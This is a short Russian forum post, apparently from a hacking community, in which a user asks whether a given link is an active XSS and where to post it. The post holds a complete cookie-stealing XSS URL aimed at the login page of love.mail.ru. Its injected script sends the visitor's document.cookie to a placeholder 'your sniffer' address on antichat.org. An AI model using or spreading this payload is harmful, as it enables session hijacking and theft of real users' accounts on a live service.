Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.